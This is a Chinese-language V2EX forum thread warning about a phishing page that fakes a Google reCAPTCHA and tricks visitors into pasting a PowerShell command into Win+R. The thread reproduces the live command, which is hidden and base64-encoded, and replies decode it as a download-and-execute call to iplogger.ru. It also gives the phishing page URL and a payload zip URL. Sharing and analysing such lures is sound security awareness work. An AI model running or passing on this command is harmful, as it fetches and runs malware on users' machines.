我也遇到了,让你执行 win+R 的钓鱼网站

63 天前
 20160409

弹窗广告,弹出了伪装 Google recaptcha 的验证界面,点击验证后变成图中这个、并把以下命令自动拷贝到了剪切板,让你执行。

供各位把玩。

⚠除非你知道自己在干嘛,否则不要执行这个 powershell 命令。

https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/CAptcha-verify-Approvals-system.html

powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=

2767 次点击
所在节点    信息安全
8 条回复
colinlikepotatos
63 天前
笑死,我 mac 打开的 都没识别一下
iorilu
63 天前
拿这行命令什么意思呢, pwsh 可以用 base64 编码得命令?
CCddf
63 天前
@iorilu iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

iex Invoke-Expression Runs commands or expressions on the local computer.
iwr Invoke-WebRequest Gets content from a web page on the internet.
-UseBasicParsing This parameter has been deprecated. Beginning with PowerShell 6.0.0, all Web requests use basic parsing only. This parameter is included for backwards compatibility only and any use of it has no effect on the operation of the cmdlet.
iqoo
63 天前
收到过好几次,自称 github issue 回复的。连系统都不判断下,mac 系统发一个 exe 链接😂 给他压力测试了
PrinceofInj
63 天前
解码了一下,实际是是下载 https://eu2.contabostorage.com/97c9beb737884d93a1899766d9f4e34c:gostired/leto15.zip 这个文件解压后执行,压缩包是啥就不知道了。不敢下载,怕被 IT 抓
NothingExist
63 天前
iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

这行命令会向一个 iplogger.ru 网站发送请求,并运行返回的内容。通常情况下,这类操作用于收集用户的 IP 地址或进行其他恶意活动,建议小心运行这种脚本,尤其是在不了解其来源的情况下。
20160409
63 天前
@PrinceofInj #5 草草的在线扫一下,有人已经扫过了

https://www.virustotal.com/gui/url/c50ae17824c6843108f64fb68f4da5334deb2c7347b7072d784c320fa3d27341

Last Analysis Date
15 hours ago
xiaocczhi
63 天前
机箱冒烟了

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1080591

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX